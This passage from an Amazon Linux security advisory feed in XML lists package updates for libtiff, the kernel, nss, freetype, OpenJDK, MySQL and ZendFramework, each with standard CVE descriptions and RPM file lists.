</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5688" title="" id="CVE-2012-5688" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1549.html" title="" id="RHSA-2012:1549" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="bind-chroot" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.10.rc1.26.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.10.rc1.26.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.10.rc1.26.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.10.rc1.26.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.10.rc1.26.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.10.rc1.26.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.10.rc1.26.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.10.rc1.26.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.10.rc1.26.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.10.rc1.26.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.10.rc1.26.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.10.rc1.26.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.10.rc1.26.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.10.rc1.26.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.10.rc1.26.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-147</id><title>Amazon Linux - ALAS-2012-147: medium priority package update for libtiff</title><issued date="2012-12-20 13:55:00" /><updated date="2014-09-14 17:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-5581:
Stack-based buffer overflow in tif_dir.c in LibTIFF before 4.0.2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted DOTRANGE tag in a TIFF image.
A stack-based buffer overflow flaw was found in the way libtiff handled DOTRANGE tags. An attacker could use this flaw to create a specially-crafted TIFF file that, when opened, would cause an application linked against libtiff to crash or, possibly, execute arbitrary code.
867235:
CVE-2012-5581 libtiff: Stack-based buffer overflow when reading a tiled tiff file
CVE-2012-4564:
ppm2tiff does not check the return value of the TIFFScanlineSize function, which allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted PPM image that triggers an integer overflow, a zero-memory allocation, and a heap-based buffer overflow.
A missing return value check flaw, leading to a heap-based buffer overflow, was found in the ppm2tiff tool. An attacker could use this flaw to create a specially-crafted PPM (Portable Pixel Map) file that would cause ppm2tiff to crash or, possibly, execute arbitrary code.
871700:
CVE-2012-4564 libtiff: Missing return value check in ppm2tiff leading to heap-buffer overflow when reading a tiff file
CVE-2012-4447:
Heap-based buffer overflow in tif_pixarlog.c in LibTIFF before 4.0.3 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted TIFF image using the PixarLog Compression format.
A heap-based buffer overflow flaw was found in the way libtiff processed certain TIFF images using the Pixar Log Format encoding. An attacker could create a specially-crafted TIFF file that, when opened, could cause an application using libtiff to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
860198:
CVE-2012-4447 libtiff: Heap-buffer overflow when processing a TIFF image with PixarLog Compression
CVE-2012-3401:
The t2p_read_tiff_init function in tiff2pdf (tools/tiff2pdf.c) in LibTIFF 4.0.2 and earlier does not properly initialize the T2P context struct pointer in certain error conditions, which allows context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted TIFF image that triggers a heap-based buffer overflow.
A heap-based buffer overflow flaw was found in the tiff2pdf tool. An attacker could use this flaw to create a specially-crafted TIFF file that would cause tiff2pdf to crash or, possibly, execute arbitrary code.
837577:
CVE-2012-3401 libtiff (tiff2pdf): Heap-based buffer overflow due to improper initialization of T2P context struct pointer
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3401" title="" id="CVE-2012-3401" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4447" title="" id="CVE-2012-4447" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4564" title="" id="CVE-2012-4564" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5581" title="" id="CVE-2012-5581" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1590.html" title="" id="RHSA-2012:1590" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libtiff-static" version="3.9.4" release="9.11.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-3.9.4-9.11.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="3.9.4" release="9.11.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-3.9.4-9.11.amzn1.i686.rpm</filename></package><package name="libtiff" version="3.9.4" release="9.11.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-3.9.4-9.11.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="3.9.4" release="9.11.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-3.9.4-9.11.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="3.9.4" release="9.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-3.9.4-9.11.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="3.9.4" release="9.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-3.9.4-9.11.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="3.9.4" release="9.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-3.9.4-9.11.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="3.9.4" release="9.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-3.9.4-9.11.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-148</id><title>Amazon Linux - ALAS-2013-148: medium priority package update for kernel nvidia</title><issued date="2013-01-14 01:14:00" /><updated date="2014-09-14 17:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-5517:
The online_pages function in mm/memory_hotplug.c in the Linux kernel before 3.6 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact in opportunistic circumstances by using memory that was hot-added by an administrator.
875374:
CVE-2012-5517 kernel: mm/hotplug: failure in propagating hot-added memory to other nodes
* A NULL pointer dereference flaw was found in the way a new node's hot added memory was propagated to other nodes' zonelists. By utilizing this newly added memory from one of the remaining nodes, a local, unprivileged user could use this flaw to cause a denial of service.
CVE-2012-4565:
871848:
CVE-2012-4565 kernel: net: divide by zero in tcp algorithm illinois
* A divide-by-zero flaw was found in the TCP Illinois congestion control algorithm implementation in the Linux kernel. If the TCP Illinois congestion control algorithm were in use (the sysctl net.ipv4.tcp_congestion_control variable set to "illinois"), a local, unprivileged user could trigger this flaw and cause a denial of service.
CVE-2012-4444:
The ip6_frag_queue function in net/ipv6/reassembly.c in the Linux kernel before 2.6.36 allows remote attackers to bypass intended network restrictions via overlapping IPv6 fragments.
874835:
CVE-2012-4444 kernel: net: acceptation of overlapping ipv6 fragments
* A flaw was found in the way the Linux kernel's IPv6 implementation handled overlapping, fragmented IPv6 packets. A remote attacker could potentially use this flaw to bypass protection mechanisms (such as a firewall or intrusion detection system (IDS)) when sending network packets to a target system.
CVE-2012-2375:
The __nfs4_get_acl_uncached function in fs/nfs/nfs4proc.c in the NFSv4 implementation in the Linux kernel before 3.3.2 uses an incorrect length variable during a copy operation, which allows remote NFS servers to cause a denial of service (OOPS) by sending an excessive number of bitmap words in an FATTR4_ACL reply. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-4131.
822869:
CVE-2012-2375 kernel: incomplete fix for CVE-2011-4131
* It was found that the RHSA-2012:0862 update did not correctly fix the CVE-2011-4131 issue. A malicious Network File System version 4 (NFSv4) server could return a crafted reply to a GETACL request, causing a denial of service on the client.
CVE-2012-2100:
The ext4_fill_flex_info function in fs/ext4/super.c in the Linux kernel before 3.2.2, on the x86 platform and unspecified other platforms, allows user-assisted remote attackers to trigger inconsistent filesystem-groups data and possibly cause a denial of service via a malformed ext4 filesystem containing a super block with a large FLEX_BG group size (aka s_log_groups_per_flex value). NOTE: this vulnerability exists because of an incomplete fix for CVE-2009-4307.
809687:
CVE-2012-2100 kernel: ext4: fix inconsistency in ext4_fill_flex_info()
* It was found that the initial release of Red Hat Enterprise Linux 6 did not correctly fix the CVE-2009-4307 issue, a divide-by-zero flaw in the ext4 file system code. A local, unprivileged user with the ability to mount an ext4 file system could use this flaw to cause a denial of service.
* It was found that the RHSA-2010:0178 update did not correctly fix the CVE-2009-4307 issue, a divide-by-zero flaw in the ext4 file system code. A local, unprivileged user with the ability to mount an ext4 file system could use this flaw to cause a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2100" title="" id="CVE-2012-2100" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2375" title="" id="CVE-2012-2375" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4444" title="" id="CVE-2012-4444" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4565" title="" id="CVE-2012-4565" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5517" title="" id="CVE-2012-5517" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1580.html" title="" id="RHSA-2012:1580" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-devel" version="3.2.36" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.2.36-1.46.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.2.36" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.2.36-1.46.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.2.36" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.2.36-1.46.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.2.36" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.2.36-1.46.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.2.36" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.2.36-1.46.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.36" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.2.36-1.46.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.2.36" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.2.36-1.46.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.2.36" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.2.36-1.46.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.2.36" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.2.36-1.46.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.36" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.2.36-1.46.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.2.36" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.2.36-1.46.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.36" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.2.36-1.46.amzn1.i686.rpm</filename></package><package name="kernel" version="3.2.36" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.2.36-1.46.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.2.36" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.2.36-1.46.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.2.36" release="1.46.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.2.36-1.46.amzn1.noarch.rpm</filename></package><package name="nvidia" version="310.19" release="2012.09.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/nvidia-310.19-2012.09.10.amzn1.x86_64.rpm</filename></package><package name="nvidia-kmod-3.2.36-1.46.amzn1" version="310.19" release="2012.09.10.amzn1" epoch="1" arch="x86_64"><filename>Packages/nvidia-kmod-3.2.36-1.46.amzn1-310.19-2012.09.10.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-149</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-149: important priority package update for nss</title><issued date="2013-02-03 12:33:00" /><updated date="2014-09-14 17:22:00" /><severity>important</severity><description /><references><reference href="https://rhn.redhat.com/errata/RHSA-2013:0213.html" title="" id="RHSA-2013:0213" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-devel" version="3.13.6" release="2.27.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.13.6-2.27.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.13.6" release="2.27.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.13.6-2.27.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.13.6" release="2.27.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.13.6-2.27.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.13.6" release="2.27.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.13.6-2.27.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.13.6" release="2.27.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.13.6-2.27.amzn1.i686.rpm</filename></package><package name="nss" version="3.13.6" release="2.27.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.13.6-2.27.amzn1.i686.rpm</filename></package><package name="nss" version="3.13.6" release="2.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.13.6-2.27.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.13.6" release="2.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.13.6-2.27.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.13.6" release="2.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.13.6-2.27.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.13.6" release="2.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.13.6-2.27.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.13.6" release="2.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.13.6-2.27.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.13.6" release="2.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.13.6-2.27.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-150</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-150: important priority package update for freetype</title><issued date="2013-02-03 12:34:00" /><updated date="2014-09-14 17:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-5669:
The _bdf_parse_glyphs function in FreeType before 2.4.11 allows context-dependent attackers to cause a denial of service (crash) via vectors related to BDF fonts and an incorrect calculation that triggers an out-of-bounds read.
A flaw was found in the way the FreeType font rendering engine processed certain Glyph Bitmap Distribution Format (BDF) fonts. If a user loaded a specially-crafted font file with an application linked against FreeType, it could cause the application to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
890088:
CVE-2012-5669 freetype: heap buffer over-read in BDF parsing _bdf_parse_glyphs() (#37906)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5669" title="" id="CVE-2012-5669" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0216.html" title="" id="RHSA-2013:0216" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="freetype-devel" version="2.3.11" release="14.13.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-devel-2.3.11-14.13.amzn1.i686.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="14.13.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-debuginfo-2.3.11-14.13.amzn1.i686.rpm</filename></package><package name="freetype" version="2.3.11" release="14.13.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-2.3.11-14.13.amzn1.i686.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="14.13.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-demos-2.3.11-14.13.amzn1.i686.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="14.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-devel-2.3.11-14.13.amzn1.x86_64.rpm</filename></package><package name="freetype" version="2.3.11" release="14.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-2.3.11-14.13.amzn1.x86_64.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="14.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-demos-2.3.11-14.13.amzn1.x86_64.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="14.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-debuginfo-2.3.11-14.13.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-151</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-151: important priority package update for java-1.7.0-openjdk</title><issued date="2013-02-03 12:35:00" /><updated date="2014-09-15 22:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-3174:
Unspecified vulnerability in Oracle Java 7 before Update 11 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2013-0422. NOTE: some parties have mapped CVE-2012-3174 to an issue involving recursive use of the Reflection API, but that issue is already covered as part of CVE-2013-0422. This identifier is for a different vulnerability whose details are not public as of 20130114.
Two improper permission check issues were discovered in the reflection API in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
This update fixes two vulnerabilities in the Oracle Java Runtime Environment and the Oracle Java Software Development Kit. Further information about these flaws can be found on the Oracle Security Alert page, listed in the References section.
894934:
CVE-2012-3174 OpenJDK: MethodHandles incorrect permission checks (Libraries, 8004933)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3174" title="" id="CVE-2012-3174" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0165.html" title="" id="RHSA-2013:0165" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-src" version="1.7.0.9" release="2.3.4.1.15.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.9-2.3.4.1.15.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.9" release="2.3.4.1.15.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.9-2.3.4.1.15.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.9" release="2.3.4.1.15.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.1.15.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.9" release="2.3.4.1.15.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.1.15.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.9" release="2.3.4.1.15.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.1.15.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.9" release="2.3.4.1.15.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.9-2.3.4.1.15.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.9" release="2.3.4.1.15.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.9-2.3.4.1.15.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.9" release="2.3.4.1.15.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.1.15.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.9" release="2.3.4.1.15.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.1.15.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.9" release="2.3.4.1.15.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.1.15.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.9" release="2.3.4.1.15.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.1.15.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-152</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-152: medium priority package update for mysql51</title><issued date="2013-02-03 12:41:00" /><updated date="2014-09-15 22:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-0572:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0572" title="" id="CVE-2012-0572" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0219.html" title="" id="RHSA-2013:0219" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql51" version="5.1.67" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-5.1.67-1.60.amzn1.i686.rpm</filename></package><package name="mysql51-libs" version="5.1.67" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-libs-5.1.67-1.60.amzn1.i686.rpm</filename></package><package name="mysql51-devel" version="5.1.67" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-devel-5.1.67-1.60.amzn1.i686.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.67" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-devel-5.1.67-1.60.amzn1.i686.rpm</filename></package><package name="mysql51-embedded" version="5.1.67" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-5.1.67-1.60.amzn1.i686.rpm</filename></package><package name="mysql51-common" version="5.1.67" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-common-5.1.67-1.60.amzn1.i686.rpm</filename></package><package name="mysql51-bench" version="5.1.67" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-bench-5.1.67-1.60.amzn1.i686.rpm</filename></package><package name="mysql51-test" version="5.1.67" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-test-5.1.67-1.60.amzn1.i686.rpm</filename></package><package name="mysql51-server" version="5.1.67" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-server-5.1.67-1.60.amzn1.i686.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.67" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-debuginfo-5.1.67-1.60.amzn1.i686.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.67" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-devel-5.1.67-1.60.amzn1.x86_64.rpm</filename></package><package name="mysql51-common" version="5.1.67" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-common-5.1.67-1.60.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded" version="5.1.67" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-5.1.67-1.60.amzn1.x86_64.rpm</filename></package><package name="mysql51-test" version="5.1.67" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-test-5.1.67-1.60.amzn1.x86_64.rpm</filename></package><package name="mysql51-libs" version="5.1.67" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-libs-5.1.67-1.60.amzn1.x86_64.rpm</filename></package><package name="mysql51-bench" version="5.1.67" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-bench-5.1.67-1.60.amzn1.x86_64.rpm</filename></package><package name="mysql51-server" version="5.1.67" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-server-5.1.67-1.60.amzn1.x86_64.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.67" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-debuginfo-5.1.67-1.60.amzn1.x86_64.rpm</filename></package><package name="mysql51" version="5.1.67" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-5.1.67-1.60.amzn1.x86_64.rpm</filename></package><package name="mysql51-devel" version="5.1.67" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-devel-5.1.67-1.60.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-153</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-153: medium priority package update for php-ZendFramework</title><issued date="2013-02-04 15:19:00" /><updated date="2014-09-15 22:24:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-5657:
889037:
CVE-2012-5657 php-ZendFramework: information disclosure flaw due to error when processing XML data
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5657" title="" id="CVE-2012-5657" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-ZendFramework-Serializer-Adapter-Igbinary" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Serializer-Adapter-Igbinary-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Mysql" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mysql-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-demos" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-demos-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Memcached" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Memcached-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Search-Lucene" version="1.12.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Search-Lucene-1.12.1-1.6.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Pdf" version="1.12.1" release="1.6.amzn1" epoch="0" 